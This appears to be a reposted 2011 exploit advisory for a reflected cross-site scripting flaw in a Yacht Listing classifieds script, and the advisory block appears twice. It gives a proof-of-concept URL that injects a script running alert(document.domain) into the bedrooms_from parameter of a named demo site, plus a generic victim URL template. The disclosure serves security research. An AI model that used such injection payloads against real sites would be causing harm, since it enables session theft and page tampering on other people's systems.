endLesS
Webmaster
< ------------------- header data start ------------------- >
# Application Name: Yacht Listing Cross Site Scripting Vuln.
# Author: expulse ~ Bug Researchers
# Date: 31.07.2011
# Example: http://www.classifiedsgeek.com/yacht-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=>**********alert(document.domain)</script>
# Vulnerable Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/preview.php?controlle...ng_search=1&type_id=&bedrooms_from=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
# Application Name: Yacht Listing Cross Site Scripting Vuln.
# Author: expulse ~ Bug Researchers
# Date: 31.07.2011
# Example: http://www.classifiedsgeek.com/yacht-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=>**********alert(document.domain)</script>
# Vulnerable Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/preview.php?controlle...ng_search=1&type_id=&bedrooms_from=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >